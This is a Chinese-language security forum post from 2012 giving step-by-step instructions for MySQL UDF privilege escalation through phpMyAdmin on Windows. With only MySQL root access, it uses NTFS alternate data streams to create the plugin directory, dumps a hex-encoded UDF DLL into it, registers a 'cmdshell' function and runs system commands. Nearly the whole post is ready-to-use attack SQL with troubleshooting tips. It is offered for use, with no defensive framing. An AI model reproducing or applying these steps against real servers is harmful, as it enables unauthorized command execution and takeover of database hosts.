找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3377|回复: 0
打印 上一主题 下一主题

PhpMyAdmin UDF 提权

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 20:13:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
适用环境:PhpMyAdmin 3.x  ,  MySQL>5.1  ,  无Shell  ,  无法爆绝对路径
前提条件: 有MYSQL的ROOT权限
思路:利用NTFS ADS创建 plugin目录 ---- 导出UDF

过程:
查询 select @@basedir  (或者 select @@datadir)
得到MySQL目录 C:\MySql\
假如该目录不存在\lib\plugin目录,利用ADS创建
查询 select 'xxx' into dumpfile 'C:\\MySQL\\lib:INDEX_ALLOCATION';
此时会报错
ERROR 3 (HY000): Error writing file 'C:\MySQL\lib:INDEX_ALLOCATION' (Errcode: 22)
但是lib目录已经创建了
再查询
select 'xxx' into dumpfile 'C:\\MySQL\\lib\\plugin:INDEX_ALLOCATION';

导出UDF.DLL
随便选一个库
查询 CREATE TABLE Temp_udf(udf BLOB);
查询 INSERT into Temp_udf values (CONVERT($shellcode,CHAR));   //$shellcode请用UDF用hex加密后的代码
查询 SELECT udf FROM Temp_udf INTO DUMPFILE 'C:\\MySQL\\lib\\plugin\\udf.dll';--
注意:在后面记得要加 -- 否者会出错,我在此处浪费无限时间(>4h)
原因可能是PhpMyAdmin查询时会自动在语句末尾加上Limit 语句,导致出错

提权
查询 Create function cmdshell returns string soname 'udf.dll';  //此处不能填绝对路径 只能是dll名
查询 select * from mysql.func;                  //看看cmdshell function是否创立,创立就继续
查询 select cmdshell('net user');               //运行各种命令提权

UDF用hex加密后的代码(从某个UDF工具里提取的)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表